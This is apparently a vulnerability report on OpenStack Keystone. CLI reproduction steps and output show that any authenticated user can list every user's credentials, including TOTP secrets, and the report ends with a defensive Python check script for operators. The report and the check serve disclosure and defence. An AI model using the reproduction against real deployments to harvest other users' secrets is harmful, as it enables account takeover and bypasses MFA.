# User creating a credential, i.e. TOTP or similar
$ OS_CLOUD=1 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 9971b0f13d2d4a578212d028a53c3209
$ OS_CLOUD=1 openstack credential create --type test 9971b0f13d2d4a578212d028a53c3209 test-data
$ OS_CLOUD=1 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID                               | Type | User ID                          | Data      | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User but same Project
$ OS_CLOUD=2 openstack token issue
| project_id | c3caf1b55bb84b78a795fd81838e5160
| user_id | 6b28a0b073fc4ac7843f33190ebc5c3c
$ OS_CLOUD=2 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID                               | Type | User ID                          | Data      | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
+----------------------------------+------+----------------------------------+-----------+------------+
# Different User and Different Project
$ OS_CLOUD=3 openstack token issue
| project_id | d43f20ae5a7e4f36b701710277384401
| user_id | 2e48f1a7d1474391a826a2b9700e5949
$ OS_CLOUD=3 openstack credential list
+----------------------------------+------+----------------------------------+-----------+------------+
| ID                               | Type | User ID                          | Data      | Project ID |
+----------------------------------+------+----------------------------------+-----------+------------+
| 0a3a2d3b7dad4886b0bbf61b6cd7d2b0 | test | 9971b0f13d2d4a578212d028a53c3209 | test-data | None       |
+----------------------------------+------+----------------------------------+-----------+------------+
As shown, any authenticated user can retrieve every credential, including its 'secret' (the Data column), regardless of which user or project owns it.
This is a rather severe information disclosure vulnerability and completely defeats the purpose of TOTP or MFA, as these credentials are not kept secure or private at all.
If auth rules are configured to allow login with only 'totp', it would be extremely easy to assume a different user's identity.
A CVE should be issued for this. I can take care of that paperwork.
Versions affected and tested:
Train/ubuntu:
$ dpkg -l | grep keystone
ii keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Daemons
ii keystone-common 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Common files
ii python-keystoneauth1 3.13.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 2.7
ii python-keystoneclient 1:3.19.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 2.x
ii python-keystonemiddleware 6.0.0-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 2.x
ii python3-keystone 2:16.0.0-0ubuntu1~cloud0 all OpenStack identity service - Python 3 library
ii python3-keystoneauth1 3.17.1-0ubuntu1~cloud0 all authentication library for OpenStack Identity - Python 3.x
ii python3-keystoneclient 1:3.21.0-0ubuntu1~cloud0 all client library for the OpenStack Keystone API - Python 3.x
ii python3-keystonemiddleware 7.0.1-0ubuntu1~cloud0 all Middleware for OpenStack Identity (Keystone) - Python 3.x
Tested against Stein and Train.
Stein/RHEL:
$ rpm -qa | grep keystone
python3-keystoneclient-3.19.0-0.20190312070330.6c4bb8b.el8ost.noarch
openstack-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
python3-keystoneauth1-3.13.1-0.20190311052414.bde07bc.el8ost.noarch
python3-keystonemiddleware-6.0.0-0.20190312071144.fca37ea.el8ost.noarch
python3-keystone-15.0.1-0.20190720060412.5f27c4b.el8ost.noarch
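As an added check for operators (not part of the original report, and not Keystone project code): the script below calls the same v3 listing that `openstack credential list` uses, `GET /v3/credentials` with an `X-Auth-Token` header, as an ordinary non-admin user and reports every credential whose `user_id` differs from the caller's. It only ever echoes credential ids, types and owners, never the `blob` (the TOTP seed or other secret). An affected deployment reports foreign credentials; a deployment whose credential policy scopes the listing to the owner reports none, so the same script confirms a policy change. The Keystone URL, token and caller user id are operator-supplied arguments; `SAMPLE_RESPONSE` is a constructed response built from the ids in the report so the logic can be exercised offline.

```python
import json
import sys
import urllib.request

# Constructed sample in the shape of Keystone's GET /v3/credentials response,
# reusing the ids that appear in the report above (the blob is a placeholder).
SAMPLE_RESPONSE = json.dumps({
    "credentials": [
        {
            "id": "0a3a2d3b7dad4886b0bbf61b6cd7d2b0",
            "type": "test",
            "user_id": "9971b0f13d2d4a578212d028a53c3209",
            "project_id": None,
            "blob": "test-data",
        }
    ],
    "links": {"self": "http://keystone.example/v3/credentials",
              "previous": None, "next": None},
})


def foreign_credentials(body, own_user_id):
    """Return (id, type, user_id) for every credential not owned by own_user_id.

    Only identifying fields are copied out; the 'blob' (the secret, e.g. a
    TOTP seed) is deliberately left in the response and never returned.
    """
    data = json.loads(body)
    return [
        (c["id"], c.get("type"), c.get("user_id"))
        for c in data.get("credentials", [])
        if c.get("user_id") != own_user_id
    ]


def fetch_credentials(keystone_url, token):
    """GET /v3/credentials as the token's user (run this with a non-admin token)."""
    req = urllib.request.Request(
        keystone_url.rstrip("/") + "/v3/credentials",
        headers={"X-Auth-Token": token, "Accept": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8")


def main(argv):
    # Usage: check.py <keystone-url> <token> <own-user-id>; with no arguments
    # the constructed sample is checked as the second user from the report.
    if len(argv) == 4:
        body, own_user_id = fetch_credentials(argv[1], argv[2]), argv[3]
    else:
        body, own_user_id = SAMPLE_RESPONSE, "6b28a0b073fc4ac7843f33190ebc5c3c"
    exposed = foreign_credentials(body, own_user_id)
    for cred_id, cred_type, owner in exposed:
        print(f"EXPOSED credential {cred_id} (type={cred_type}) owned by user {owner}")
    print("deployment exposes other users' credentials" if exposed
          else "only the caller's own credentials are visible")
    return 1 if exposed else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The exit status (1 when foreign credentials are visible, 0 otherwise) makes the check usable from a post-upgrade or policy-change verification job; run it with a token for a plain project member, since an admin token is expected to see everything.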